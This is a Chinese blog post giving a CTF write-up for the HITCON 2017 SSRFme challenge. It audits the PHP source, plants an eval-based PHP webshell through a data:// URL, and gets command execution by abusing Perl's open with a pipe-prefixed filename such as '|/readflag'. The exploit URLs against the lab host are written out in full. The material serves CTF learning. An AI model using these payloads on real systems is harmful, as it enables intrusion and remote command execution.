[HITCON 2017]SSRFme1

于 2024-06-22 17:34:31 发布
阅读量1.1k 收藏 16
点赞数 17
分类专栏: CTF 文章标签: 网络 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alwtj/article/details/139884134
版权

知识点:

        1. php代码审计

        2. SSRF&伪协议

        3. perl语言漏洞

PHP代码审计

 <?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

进入页面开始代码审计~

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {  
    $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);  
    $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];  
}

这段代码首先检查$_SERVER['HTTP_X_FORWARDED_FOR']是否存在,如果存在,则认为这是一个代理IP。然后,它使用explode函数将代理IP字符串(可能是由多个IP组成的,由逗号分隔)分割成数组,并取第一个IP作为$_SERVER['REMOTE_ADDR']的值。这通常用于在反向代理环境中获取原始客户端的IP地址.

echo $_SERVER["REMOTE_ADDR"];

输出客户端的ip地址.

$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);  
@mkdir($sandbox);  
@chdir($sandbox);

 这里首先根据客户端的IP地址(已经过MD5哈希处理,并附加了"orange"字符串)创建一个沙盒目录名称。然后,使用@mkdir(@用于抑制错误消息)尝试创建这个目录。如果目录成功创建,使用@chdir切换到这个目录.

$data = shell_exec("GET " . escapeshellarg($_GET["url"]));

将执行shell_exec里面的内容(用GET方法去请求url),并赋值给$data.

$info = pathinfo($_GET["filename"]);  
$dir  = str_replace(".", "", basename($info["dirname"]));  
@mkdir($dir);  
@chdir($dir);  
@file_put_contents(basename($info["basename"]), $data);

首先,通过pathinfo函数解析$_GET["filename"],获取其中的目录名和文件名.然后,它尝试创建一个新的目录(基于目录名,但移除了所有点.),并切换到该目录。最后,使用file_put_contents函数将数据保存到文件中,文件名基于$_GET["filename"]中的基本文件名.

大概总结一下就是你要传入一个url参数和一个filename参数,url参数会被执行get请求,得到后的内容会被写入到 sandbox/md5(orange.ip)/filename 目录下.

所以我么可以将url的内容定义为 / , 之后filename就叫love吧~

http://9e8fa588-61bd-463f-982d-75d20626a6a1.node5.buuoj.cn:81/?filename=love&url=/

开始执行.

结果为.

 

可以清晰的看到根目录下存在一个flag的文件,但是我们GET请求只能读取目录不能读取文件内容 😅.

方法一,SSRF&伪协议

我们可以去构造一个webshell去读取flag,可以使用data伪协议来构建.

url=data://text/plain,<?php @eval($_POST[cmd]); ?>,那么filename就叫love.php吧~

http://9e8fa588-61bd-463f-982d-75d20626a6a1.node5.buuoj.cn:81/?filename=love.php&url=data://text/plain,<?php @eval($_POST[cmd]); ?>

执行成功后连接一下~

 

去访问一下 /flag 发现什么都没有 😅 .

不过有一个叫readflag的文件.

 

去执行一下~

 

得到了flag,我又试了试cat flag ,结果告诉我没有权限,只有root账户才能读~ 

方法二,perl语言漏洞

因为GET函数在底层调用了perl语言中的open函数,但是该函数存在rce漏洞。当open函数要打开的文件名中存在管道符(并且系统中存在该文件名),就会中断原有打开文件操作,并且把这个文件名当作一个命令来执行.

首先我们先创建一个同名文件~
 

http://131cc1e9-3c92-4b0c-ac15-4bc71fff7f9d.node5.buuoj.cn:81/?url=&filename=|/readflag

之后去执行命令~

http://131cc1e9-3c92-4b0c-ac15-4bc71fff7f9d.node5.buuoj.cn:81/?url=file:|/readflag&filename=123

最后访问我们写入了执行结果的文件~

http://131cc1e9-3c92-4b0c-ac15-4bc71fff7f9d.node5.buuoj.cn:81/sandbox/e51a046f7f8d8c6a6ff47114cd2cd296/123

 出现flag,游戏结束~ 

 

 

 

 

 

安红豆.
关注
专栏目录
BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 661
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
HITCON2017 babyfirst-revenge v2
forbidd3n,keep going
05-22 614
被5虐过后,现在到4了,没想到难度大很多,这些就记一下总结下来的方法和姿势。先总结ls -t的方法,后面再补充tar的姿势。 1、构造ls -t 在上一题中我们大概知道了构造ls -t的要素,但是在本题中,由于长度的进一步限制,`ls>>_`将无法使用。这就要使用到其他技巧。 技巧0:* 在当前工作目录下使用*命令,会将目录名当作命令执行(顺序) 执行*即-t ...
[HITCON 2017]SSRFme
最新发布
wwwyyyxxxx的博客
03-09 468
x-forwarded-for值可以在请求头伪造一个任意值便于访问上传的文件,filename值用于指定写入的文件名,url用于拼接shell_exec的字符串参数,然后将shell_exec的结果写入filename指定的文件。shell_exec()拼接的GET参数表示执行一个GET请求,在本地试了一下可以用伪协议,也可以直接任意文件读取,不支持php协议,但是连上之后不能直接读取flag和readflag,也不能直接执行readflag。这里既然是将内容写入指定的文件,并且文件名没有任何过滤。
BUUCTF [HITCON 2017]SSRFme 1
weixin_46245411的博客
07-14 2483
文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 说明 题目直接给出了源码,原本以为会很简单,没想到涉及了一大堆的linux命令行的命令执行,看了别人大佬的WP后感动鸭梨山大,但是认真复现后发现受益良多~ 一、代码审计(这里为了不泄露个人信息,就假设了一个IP地址吧) 原本还以为是很简单的XFF漏洞利用,没想到啊~ 127.0.0.1<?php if (isset($_SERVER['HTTP_X_FORW...
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
Hitcon2017 babyfirst-revenge复现
0verWatch的博客
09-06 2867
前言 开学了还是得学习的,复现一波题目来玩玩,其实是实力不够不能去打网鼎杯emmm 正文 先从Hitcon2017 babyfirst-revenge这一个题目,总结一下还是学到很多东西的 复现地址 https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge 这是题目回...
2017 hitcon Ssrf_me 详解 (perl脚本中GET open漏洞及解析漏洞)
a3320315的博客
12-15 1894
0x01 源码 http://117.50.3.97:8004/ <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapesh...
BMZCTF:ssrfme
末初的CSDN博客
01-24 1053
http://bmzclub.cn/challenges#ssrfme <?php if(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path']; }else{ show_source(__FILE__); exit(); } if(strpos($path,'..') > -1){ die('This is
BUUCTF之[HITCON 2017]SSRFme详解
m0_62107966的博客
09-09 847
BUUCTF之[HITCON 2017]SSRFme详解 $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//题目提供了沙盒目录,目录名就是sandbox , 给了沙盒目录, $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//题目提供了沙盒目录,目录名就是sandbox ,md5是将(orangeip地址)这个整体进行加密。,注意中间不能有空格!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安红豆.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值